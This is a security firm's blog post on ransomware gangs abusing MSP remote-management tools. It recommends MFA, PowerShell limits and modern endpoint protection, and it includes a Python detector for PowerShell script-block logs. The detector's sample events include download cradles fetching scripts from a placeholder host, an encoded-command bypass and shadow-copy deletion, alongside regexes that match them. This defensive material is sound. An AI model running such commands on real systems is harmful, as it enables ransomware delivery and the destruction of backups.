Managed Service Providers (MSPs) that use Remote Monitoring and Management (RMM) tools without key security precautions expose themselves, and their clients, to a disaster of epic proportions.
Criminals have discovered a very lucrative new target in the ransomware war happening across the United States right now: Managed Services Providers, or MSPs as the industry calls them. MSPs are paid to keep business computers patched and users connected to the business applications that millions of small and mid-size businesses use every day. MSPs rely on RMM tools like ConnectWise Automate (formerly known as Labtech) and Continuum’s Command in order to effectively service dozens to hundreds of small businesses, each with dozens to hundreds of computers and users.
RMM helps MSPs ensure that their clients’ computers are patched, identify problems and get them fixed before they cause system outages, and service many more clients than could otherwise be managed through old-fashioned remote access tools and processes. RMM has had a tremendous impact on MSP profitability for the last few years, and the trend for MSPs to adopt more and more RMM features is set to rise dramatically.
However, MSPs are advised to slam the brakes on using RMM tools if they don’t have the proper security controls in place. If not, they risk complete destruction at the hands of hackers.
Lack of Multi-Factor Authentication (MFA)
Many RMM tools use a Software-as-a-Service model and allow login to the management console website from any public Internet connection. Furthermore, many offer Multi-Factor Authentication (MFA), including integrations with MFA providers like Duo and Okta. However, none of the RMM tools require MFA to function. Instead, RMM providers offer MFA as an option that is not enabled by default. Many MSPs have not enabled MFA and are not currently enforcing its use. Therefore, for many MSPs, compromise of RMM login credentials will allow attackers to log in from anywhere at any time. This has led to dozens of MSP and MSP client breaches in the last few months.
Compounding this issue is the fact that most RMM tools allow Windows PowerShell commands to be issued from the RMM administration console to any and all computers that have RMM agents installed. PowerShell is a very powerful administration tool that has been an unremovable part of Windows since Windows 7 was released. Any command that an administrator might run today can be crafted as a PowerShell script and sent out via the RMM tools so that all managed computers get the same set of instructions. PowerShell is used by attackers to download and execute ransomware encryption executables with names like RYUK, Sodinokibi, WannaCry, and others. We have seen very efficient use of PowerShell to deploy and execute ransomware attacks by attackers who know exactly how to navigate popular RMM tools and deploy payloads via PowerShell.
Finally, many MSPs are still using legacy, signature-based anti-virus (AV) software that cannot detect today’s polymorphic and otherwise advanced malware delivery mechanisms for ransomware and other threats. These legacy AV products may still have some effectiveness for stopping “commodity” level malware, adware, and spyware. However, they fail miserably when tested against the ransomware strains and deployment systems used by the Sodinokibi and RYUK ransomware families. Our data breach responders have seen dozens of examples of common AV products failing to stop ransomware from executing.
Each of these three conditions (lack of MFA, PowerShell execution, and commodity/legacy AV) is concerning by itself. However, when these issues exist together and are leveraged by attackers to deploy ransomware, the results are devastating.
One victim MSP who engaged Ingalls Information Security to help respond to a ransomware outbreak had more than 90 clients with systems encrypted, with each computer requiring a $6,000 ransom payment in Bitcoin before data could be recovered. Although most systems had valid backups and could be restored, dozens had to have ransom payments made in order to get back data that was not backed up or had backups destroyed by the attackers during the attack.
In order to control the risks that MSPs face due to RMM tool capabilities and how attackers are using RMM to deploy ransomware, we recommend the following efforts be performed immediately in order to protect MSPs and their clients:
- Enable and enforce Multi-Factor Authentication on any and all RMM management accounts used for MSP service delivery.
- Prevent PowerShell execution on ALL hosts where it is possible, or limit PowerShell usage to only the specific directories required for a bare-minimum set of administrative tasks.
- Change passwords on RMM tools and rotate them regularly, ESPECIALLY if the MSP has not enabled MFA (for example if the MSP can’t comply with recommendation #1).
- Deploy next-generation endpoint protection that does NOT rely on signature-based detection of malware, and partner with a Managed Security Services Provider (MSSP) to collect and monitor logs and other data to identify attacks prior to payload deployment.
- Reduce RMM user accounts to the bare minimum and audit them regularly.
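The PowerShell delivery path described earlier and the log monitoring called for in the fourth recommendation can be tied together in a small detection routine. The following Python script is an added example, not code from Ingalls Information Security or from any RMM vendor: it reads constructed lines in the shape of PowerShell Script Block Logging events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), decodes any `-EncodedCommand` payload so rules can see what the encoding hides, and scores each script block against a few widely used indicators (download cradles, Invoke-Expression, execution policy bypass, and shadow copy deletion, which corresponds to the backup destruction noted in the MSP case above). The flattened log layout, host names, timestamps, URLs and rule weights are all assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass, field

# --- Constructed sample input -------------------------------------------------
# These lines are invented for this example. They mimic PowerShell Script Block
# Logging events (Event ID 4104, Microsoft-Windows-PowerShell/Operational log)
# flattened by a hypothetical log shipper to "id|timestamp|host|ScriptBlockText=<script>".
# The real event is XML and field names vary by collector.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2.ps1')"
    .encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    "4104|2019-08-01T02:11:09Z|SRV-FILE01|ScriptBlockText=Get-Service -Name Spooler | Restart-Service",
    "4104|2019-08-01T02:12:41Z|SRV-FILE01|ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage1.ps1')",
    f"4104|2019-08-01T02:13:05Z|WS-ACCT07|ScriptBlockText=powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand {ENCODED_SAMPLE}",
    "4104|2019-08-01T02:14:30Z|WS-ACCT07|ScriptBlockText=Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "4104|2019-08-01T02:15:02Z|SRV-FILE01|ScriptBlockText=Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }",
]

# --- Detection rules ----------------------------------------------------------
# (name, pattern, weight). Weights are illustrative, not a calibrated model.
RULES = [
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I), 3),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I), 1),
    ("shadow_copy_tamper", re.compile(r"Win32_ShadowCopy|vssadmin\b.*\bdelete\s+shadows", re.I), 3),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE text once decoded).
ENCODED_CMD = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
ENCODED_WEIGHT = 2
ALERT_THRESHOLD = 3


@dataclass
class Finding:
    host: str
    timestamp: str
    score: int
    rules: list = field(default_factory=list)
    script: str = ""


def decode_encoded_command(script):
    """Return (text, was_encoded). If the script carries an -EncodedCommand
    payload, the decoded UTF-16LE content is appended so the rules can match it."""
    m = ENCODED_CMD.search(script)
    if not m:
        return script, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return script, False          # not valid base64: treat as plain text
    return f"{script}\n# decoded: {decoded}", True


def parse_event(line):
    """Split 'id|ts|host|ScriptBlockText=...' into (ts, host, script); None for other events."""
    parts = line.split("|", 3)        # maxsplit keeps '|' pipes inside the script intact
    if len(parts) != 4 or parts[0] != "4104":
        return None
    _, ts, host, rest = parts
    prefix = "ScriptBlockText="
    if not rest.startswith(prefix):
        return None
    return ts, host, rest[len(prefix):]


def score_script(script):
    """Apply every rule to the (decoded) script block; return (score, [rule names])."""
    text, encoded = decode_encoded_command(script)
    hits, score = [], 0
    if encoded:
        hits.append("encoded_command")
        score += ENCODED_WEIGHT
    for name, pattern, weight in RULES:
        if pattern.search(text):
            hits.append(name)
            score += weight
    return score, hits


def analyze(lines):
    """Return a Finding for every 4104 event whose score reaches ALERT_THRESHOLD."""
    findings = []
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        ts, host, script = parsed
        score, hits = score_script(script)
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(host, ts, score, hits, script))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.timestamp} {f.host} score={f.score} rules={','.join(f.rules)}")
```

Two caveats when applying this for real: Script Block Logging must be turned on before any of these events exist, and the MSP's own RMM-pushed maintenance scripts will routinely trip the download and execution-policy rules, so the RMM agent's process or script path needs an explicit allow-list rather than a lowered threshold. The point of the exercise is that the same PowerShell channel attackers use is fully observable to the defender once logging reaches the MSSP.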
We at Ingalls Information Security hope that MSPs heed this very serious warning about RMM tool access by ransomware attackers. Unfortunately, we also expect more MSPs to suffer breaches.
We are ready to assist MSPs and their clients, in a rapid and discreet way that reduces impact through speed of resolution.
Contact us immediately if you are an MSP who has been attacked with ransomware, or your MSP has notified you that they have been hit. We have the expertise to resolve these types of attacks and get you back to normal as fast as possible.